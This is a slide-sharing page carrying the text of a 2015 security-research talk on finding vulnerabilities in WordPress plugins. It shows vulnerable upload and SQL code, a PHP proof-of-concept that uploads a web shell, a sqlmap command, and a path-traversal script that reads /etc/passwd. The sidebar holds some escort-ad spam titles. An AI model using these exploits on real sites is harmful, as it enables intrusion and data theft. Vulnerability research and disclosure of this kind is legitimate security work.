The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about usDynamic Netsoft
 

Dernier (20)

(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
Exploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the ProcessExploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the Process
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 

Hacking Wordpress Plugins

  • 1. Hacking WordPress Plugins Larry W. Cashdollar 8/1/2015 v1.2
  • 2. What is WordPress • Content Management System (CMS) • 23% of all websites (3/23/15) • Plugins - add functionality • Plugins may be authored by anyone
  • 3. Why hack WordPress plugins? • #1 CMS by number and percentage • Poor security model • Lack of QA on 3rd party plugins • More fun than Ruby Gems
  • 4. Methodology • Large code footprint with plugins and themes • Prefer no authentication required to exploit* • Look for PHP code that might be exploitable • Search specific traits or patterns: – upload.php – download.php – proxy.php
  • 5. Requirements • Processes user input • Has reachable code, not just defining a class • Doesn’t check if accessed directly • Doesn’t require authentication • Doesn’t require WP API hooks*
  • 6. Vulnerabilities • LFI • RFI • RCE • Open Proxies • SQL Injection • XSS
  • 7. Plugin Code Criteria • Doesn’t have POST/GET/FILE/REQUEST PUNT • If (!defined(ABSPATH)) die; PUNT • If (!is_admin) die; PUNT • Function class() {}; PUNT • May have Injectable SELECT, INSERT, DELETE, UPDATE, etc.
  • 8. A Quick Look • Download a few random plugins • Examine files named upload.php or download.php • Found RFI in videowhisper-video-presentation • The code:
  • 9. 1 <?php 2 3 if ($_GET["room"]) $room=$_GET["room"]; 4 if ($_POST["room"]) $room=$_POST["room"]; 5 $filename=$_FILES['vw_file']['name']; 6 7 include_once("incsan.php"); 8 sanV($room); 9 if (!$room) exit; 10 sanV($filename); 11 if (!$filename) exit; 12 13 if (strstr($filename,'.php')) exit; 14 15 //do not allow uploads to other folders 16 if ( strstr($room,"/") || strstr($room,"..") ) exit; 17 if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 18 19 $destination="uploads/".$room."/"; 20 if ($_GET["slides"]) $destination .= "slides/"; 21 22 $ext=strtolower(substr($filename,-4)); 23 $allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi ",".mpg",".ppt",".pps "); 24 25 if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); 26 ?>loadstatus=1
  • 10. Exploiting it • Upload .phtml .shtml • Execute as www-data user • Previously patched (I circumvented)* • Also present in videowhisper-video- conference-integration * Annoying but still fun
  • 11. Initial Progress • Downloaded 10 random plugins • Found RFI in two of them! • Plugins had ~ 5k downloads • Must be more vulnerabilities out there
  • 12. Automate? • Download lots of plugins • grep code for specific patterns? • Same idea as Ruby Gem research I did • Easy to test with PoC • More fun! • Maybe write code to flag high risk code?
  • 13. Code Ferret v1.0 Feature Doc • Supply list of .php files to examine • Check for user input • Ignore if author checks for ABSPATH etc.. • Look for SQL functions • Flag if use of WP API • Flag if include files
  • 14. Code Ferret v1.0 Design Doc • Look for specific functions and strings • Anything of interest added to link list • Link list stores line number and reason for flag • Dump output & statistics • ANSI COLOR!
  • 15. Semi Automatic • git pull https://plugins.svn.wordpress.org • Scraped Plugins off wordpress.org • Downloaded 36,000 plugins • About 20 GB of data • upload.php or download.php • Use Ferret v1.0 to quickly examine lots of files • Profit! Err get some CVEs
  • 17. Ferret First Run • wp-powerplaygallery v3.3 • Flagged for user input with no access controls • Accesses WordPress API calls • Loads WordPress functions via require_once() • Code examination turns up RFI and Blind SQLi!
  • 18. wp-powerplaygallery RFI Code 143: if (!empty($_FILES)) { 144: if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) { 145: die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}'); 146: } 147: 148: // Read binary input stream and append it to temp file 149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) { 150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); 151: } . 158: while ($buff = fread($in, 4096)) { 159: fwrite($out, $buff); 160: }
  • 19. wp-powerplaygallery SQLI code 131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."',' ".$_REQUEST['name']."',1,'','NULL')"; 133 : $wpdb->query($query);
  • 20. RFI Exploit Requirements • POST request • Variable albumid must point at existing album in database • File to upload must exist locally • Use c99 shell as our payload • file variable contains payload with local full path • name variable contains our filename
  • 21. PoC Exploit • <?php • /*Remote shell upload exploit for wp-powerplaygallery v3.3 */ • /*Larry W. Cashdollar @_larry0 • 6/27/2015 • albumid needs to be a numeric value matching an existing album number, 1 is probably a good start • but you can enumerate these by using curl, and looking for redirect 301 responses: • e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big • ->301 exists else 404 doesn't. • shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php • */ • • • $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo "POST to $target_url $file_name_with_full_path"; • $post = array('albumid'=>’1' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "<hr>"; • echo $result; • echo "<hr>"; • ?>
  • 22. Blind SQLi Exploit • Sqlmap $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp- powerplaygallery/upload.php --data "albumid=1” —dbms mysql –level 5 – risk 3
  • 23. Lazy Exploits • Started using php-cgi to test exploits • The script Poc.sh #!/bin/sh export GATEWAY_INTERFACE=CGI/1.1 export PATH_TRANSLATED=UserSettings.php export QUERY_STRING=network=../../../../../../../../etc/passwd export REDIRECT_STATUS=CGI export REQUEST_METHOD=GET php-cgi ./plugin/buddystream/extensions/default/templates/UserSettings.php $ ./Poc.sh
  • 24. Pitfalls of Exploitation • Exploitable code is a class and isn’t reachable* • Code uses WordPress functions or functions from other segments of code with no includes • Code is incomplete or just broken • Someone discovered it last year
  • 25. Fatal Errors • [Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27 • [Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90 • [Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20 • [Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20 • [Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
  • 26. Vulnerable and Broken • <?php • $uploaddir = 'uploads/'; This needs to be full path • $file = $uploaddir . basename($_FILES['uploadfile']['name']); • if (move_uploaded_file($_FILES['uploadfile']['tmp_name' ], $file)) { • echo "success"; • } else { • echo "error"; • } • ?>
  • 27. oddities • Return local IP address of server • Prints the FULL path of the webserver server • Plugin that downloads itself ?!
  • 28. Statistics • 20 CVEs • 26* Vulnerabilities found • 6 were previously discovered and not included* • All in all 32 Vulnerabilities discovered • Dozens of known exploitable vulnerabilities remain unpatched * I now google ‘<pluginname> vulnerability’ before bothering to document
  • 29. Improvements • Parse php scripts checking for reachable code • Use RIPS v1.0 (thanks Chad!) • Circle back and examine vulnerabilities that require login to WP for exploitation
  • 31. Who Am I • 15 years at Akamai Technologies • ​Hobbyist Vulnerability Researcher • ​75+ CVEs • ​Formerly Unix Systems Administrator 17 years • ​Penetration Tester Back in Late 90s • Enjoy Writing and Breaking Code